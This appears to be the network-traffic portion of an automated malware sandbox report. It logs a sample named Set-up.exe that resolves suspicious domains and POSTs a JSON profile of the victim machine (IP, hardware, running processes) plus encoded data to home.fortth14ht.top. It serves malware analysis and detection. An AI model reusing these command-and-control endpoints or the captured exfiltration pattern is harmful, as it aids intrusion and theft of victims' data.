Dec 28, 2024 09:57:00.389770031 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:00.392019033 CET	49718	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:00.392047882 CET	443	49718	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:00.397578955 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:00.397615910 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:00.397696018 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:00.398022890 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:00.398036003 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:01.076814890 CET	80	49720	194.87.58.92	192.168.2.12
Dec 28, 2024 09:57:01.076922894 CET	80	49720	194.87.58.92	192.168.2.12
Dec 28, 2024 09:57:01.077094078 CET	49720	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:57:01.077253103 CET	49720	80	192.168.2.12	194.87.58.92
Dec 28, 2024 09:57:01.196640968 CET	80	49720	194.87.58.92	192.168.2.12
Dec 28, 2024 09:57:01.657397985 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:01.657556057 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:01.659282923 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:01.659302950 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:01.659617901 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:01.667992115 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:01.667992115 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:01.668117046 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458755970 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458826065 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458858013 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458878040 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.458889008 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458925009 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.458930016 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458940029 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.458981991 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.458987951 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.466979027 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.467046976 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.467056036 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.475367069 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.475430965 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.475439072 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.518040895 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.578367949 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.627418041 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.627433062 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.663809061 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.663867950 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.663878918 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.663892031 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.663938999 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.663947105 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.663979053 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.664025068 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.670835972 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.670862913 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.670875072 CET	49721	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.670881987 CET	443	49721	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.833770990 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.833811045 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:02.833908081 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.834204912 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:02.834218979 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.092569113 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.092642069 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.094290972 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.094300032 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.094538927 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.095963955 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.096039057 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.096070051 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.988487005 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.988589048 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:04.988650084 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.988862991 CET	49722	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:04.988882065 CET	443	49722	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:05.039135933 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:05.039176941 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:05.039355040 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:05.040602922 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:05.040615082 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:06.345082045 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:06.345220089 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:06.346668959 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:06.346677065 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:06.346910000 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:06.348320961 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:06.348491907 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:06.348515987 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:06.348583937 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:06.395323992 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:07.225054026 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:07.225147009 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:07.225263119 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:07.225394011 CET	49723	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:07.225419044 CET	443	49723	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:07.425185919 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:07.425235987 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:07.425354958 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:07.425707102 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:07.425724983 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:08.729378939 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:08.729693890 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:08.730804920 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:08.730813980 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:08.731067896 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:08.732405901 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:08.732517004 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:08.732543945 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:08.732595921 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:08.732606888 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:09.732033014 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:09.732126951 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:09.732212067 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:09.732435942 CET	49724	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:09.732465982 CET	443	49724	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:09.920974970 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:09.921017885 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:09.921087027 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:09.921380997 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:09.921394110 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:11.178951979 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:11.179090977 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:11.188971043 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:11.189001083 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:11.189280987 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:11.198056936 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:11.202001095 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:11.202017069 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:12.023581982 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:12.023711920 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:12.023787022 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:12.023964882 CET	49725	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:12.023987055 CET	443	49725	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:12.427515984 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:12.427572966 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:12.427701950 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:12.428014994 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:12.428035021 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.643686056 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.643765926 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.645693064 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.645706892 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.646071911 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.647644043 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.648690939 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.648740053 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.648859024 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.648897886 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.649012089 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.649056911 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.649184942 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.649225950 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.649359941 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.649393082 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.649544001 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.649574995 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.695347071 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.695545912 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.695606947 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.743341923 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.743534088 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.743593931 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.743609905 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.791346073 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.791702032 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.791774035 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.839337111 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.839504004 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.883343935 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.888933897 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:13.889034033 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:13.889056921 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:14.009438038 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:16.120728970 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:16.120830059 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:16.120897055 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:16.121181011 CET	49726	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:16.121201038 CET	443	49726	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:16.132581949 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:16.132633924 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:16.132715940 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:16.133035898 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:16.133054018 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:17.397077084 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:17.397218943 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:17.398498058 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:17.398509026 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:17.398762941 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:17.400052071 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:17.400111914 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:17.400136948 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198452950 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198672056 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198720932 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198745966 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.198750973 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198771000 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198807955 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.198821068 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.198864937 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.198875904 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.210076094 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.210149050 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.210160971 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.218359947 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.218429089 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.218436003 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.226676941 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.226742983 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.226751089 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.226787090 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.226831913 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.226932049 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.226947069 CET	443	49728	104.21.2.51	192.168.2.12
Dec 28, 2024 09:57:18.226969957 CET	49728	443	192.168.2.12	104.21.2.51
Dec 28, 2024 09:57:18.226975918 CET	443	49728	104.21.2.51	192.168.2.12

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 28, 2024 09:56:36.451435089 CET	53749	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:36.451519012 CET	53749	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:36.591531038 CET	53	53749	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:36.591542006 CET	53	53749	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:43.329765081 CET	61351	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:43.554287910 CET	53	61351	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:53.187413931 CET	61297	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:53.187475920 CET	61297	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:53.485769033 CET	53	61297	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:53.636398077 CET	53	61297	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:57.522625923 CET	55672	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:57.522696972 CET	55672	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:57.664333105 CET	53	55672	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:57.664447069 CET	53	55672	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:57.826375008 CET	57881	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:58.252166033 CET	53	57881	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:59.195799112 CET	57882	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:59.195858002 CET	57882	53	192.168.2.12	1.1.1.1
Dec 28, 2024 09:56:59.511045933 CET	53	57882	1.1.1.1	192.168.2.12
Dec 28, 2024 09:56:59.511054039 CET	53	57882	1.1.1.1	192.168.2.12

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 28, 2024 09:56:36.451435089 CET	192.168.2.12	1.1.1.1	0xa18b	Standard query (0)	httpbin.org	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:36.451519012 CET	192.168.2.12	1.1.1.1	0x9cad	Standard query (0)	httpbin.org	28	IN (0x0001)	false
Dec 28, 2024 09:56:43.329765081 CET	192.168.2.12	1.1.1.1	0x631c	Standard query (0)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:53.187413931 CET	192.168.2.12	1.1.1.1	0x1a5d	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:53.187475920 CET	192.168.2.12	1.1.1.1	0xddfb	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:56:57.522625923 CET	192.168.2.12	1.1.1.1	0x5ac	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:57.522696972 CET	192.168.2.12	1.1.1.1	0xece5	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false
Dec 28, 2024 09:56:57.826375008 CET	192.168.2.12	1.1.1.1	0xccc7	Standard query (0)	spuriotis.click	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:59.195799112 CET	192.168.2.12	1.1.1.1	0x86f8	Standard query (0)	home.fortth14ht.top	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:59.195858002 CET	192.168.2.12	1.1.1.1	0x20ac	Standard query (0)	home.fortth14ht.top	28	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 28, 2024 09:56:36.591531038 CET	1.1.1.1	192.168.2.12	0xa18b	No error (0)	httpbin.org		3.218.7.103	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:36.591531038 CET	1.1.1.1	192.168.2.12	0xa18b	No error (0)	httpbin.org		34.226.108.155	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:43.554287910 CET	1.1.1.1	192.168.2.12	0x631c	Name error (3)	yYkNteoVRFthbcESpvExVn.yYkNteoVRFthbcESpvExVn	none	none	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:53.485769033 CET	1.1.1.1	192.168.2.12	0x1a5d	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:57.664333105 CET	1.1.1.1	192.168.2.12	0x5ac	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:58.252166033 CET	1.1.1.1	192.168.2.12	0xccc7	No error (0)	spuriotis.click		104.21.2.51	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:58.252166033 CET	1.1.1.1	192.168.2.12	0xccc7	No error (0)	spuriotis.click		172.67.128.184	A (IP address)	IN (0x0001)	false
Dec 28, 2024 09:56:59.511045933 CET	1.1.1.1	192.168.2.12	0x86f8	No error (0)	home.fortth14ht.top		194.87.58.92	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

httpbin.org

spuriotis.click

home.fortth14ht.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.12	49714	194.87.58.92	80	6744	C:\Users\user\AppData\Local\Temp\Set-up.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 09:56:53.758671045 CET	12360	OUT	POST /nTrmoVgOaovBJpKSuLkP1735210003 HTTP/1.1 Host: home.fortth14ht.top Accept: / Content-Type: application/json Content-Length: 502157 Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 31 36 35 38 39 39 30 39 36 36 37 39 38 36 37 35 38 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED] Data Ascii: { "ip": "8.46.123.189", "current_time": "8516589909667986758", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 336 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 580 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 760 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "fontdrvhost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": 876 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 372 }, { "name": "svchost.exe", "pid": 404 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe" [TRUNCATED]
Dec 28, 2024 09:56:53.878376007 CET	2472	OUT	Data Raw: 63 51 35 48 6c 4e 4b 71 6e 69 5a 78 70 4f 46 43 70 56 71 77 63 6b 35 77 6a 46 38 78 2b 62 2b 4b 5c 2f 30 61 5c 2f 47 33 77 50 79 7a 4b 73 34 38 55 75 42 73 52 77 70 6c 75 64 34 36 70 6c 75 56 34 71 72 6e 58 44 57 61 78 78 57 4e 70 59 65 57 4b 71 Data Ascii: cQ5HlNKqniZxpOFCpVqwck5wjF8x+b+K\/0a\/G3wPyzKs48UuBsRwplud46pluV4qrnXDWaxxWNpYeWKqUFDIs5zSrSaw8ZVFOvTpU5JNRnKWh5\/RT2XHI6fyplf0CfhgUUUUGlPr8v1IXj5D+\/+f1\/z6NqxX70\/wDBLT9i79mn9o79n3xd43+M3w2\/4TLxNpXxg8QeE9P1H\/hL\/Hnh0W+gWPgzwDrNtZGz8KeKNCsZ
Dec 28, 2024 09:56:53.878448009 CET	4944	OUT	Data Raw: 6f 61 74 31 47 7a 64 68 2b 4a 5c 2f 77 72 57 47 33 7a 5c 2f 52 48 5a 54 36 5c 2f 4c 39 53 6e 55 63 6e 62 38 66 36 56 4f 5c 2f 58 38 50 36 6d 6d 56 5a 6f 56 36 6a 6b 48 33 33 5c 2f 45 66 5c 2f 58 71 7a 4a 39 78 76 70 55 56 42 30 46 65 71 38 6e 2b Data Ascii: oat1Gzdh+J\/wrWG3z\/RHZT6\/L9SnUcnb8f6VO\/X8P6mmVZoV6jkH33\/Ef\/XqzJ9xvpUVB0Feq8n+wm7H+e9XJO34\/0qt91u+P6H\/P6UHVS6f4f8hnTZ\/H0\/r\/AJ\/Hv3Y33X+o\/ktTbvv\/AMH+f89enU9KZQbFM\/8ALP8AD+lQP0\/H+hq7sb0\/l\/jUMiudh+\/\/AJ\/n29vxoLhv8v1RTK\/3E\/8AIv0
Dec 28, 2024 09:56:53.878570080 CET	7416	OUT	Data Raw: 2b 31 7a 46 6f 69 61 74 42 70 46 78 34 4e 38 56 36 76 5a 57 75 74 58 4f 75 54 36 68 62 6e 78 46 38 4f 50 44 48 69 4f 5c 2f 77 44 74 4d 66 69 4b 65 66 56 37 4f 36 76 4e 56 31 61 5c 2f 31 4c 55 4c 4f 38 4d 63 38 65 70 33 74 38 39 78 43 6c 31 4c 50 Data Ascii: +1zFoiatBpFx4N8V6vZWutXOuT6hbnxF8OPDHiO\/wDtMfiKefV7O6vNV1a\/1LULO8Mc8ep3t89xCl1LPn+yfDeOcZHxzw9jMFicblWJ\/wBZ8nyjMMRgMVVoOu6OeYGhi8BPFYWsnWw953dBzqUKtPlko23\/AAzxVo5BxB4d8U4fMcBluc0f9T8\/zXAUczwNDFfVnPh\/MMRhMwpYfG0JOhXTovlrKFOvSqJXkpKy\/jzqO
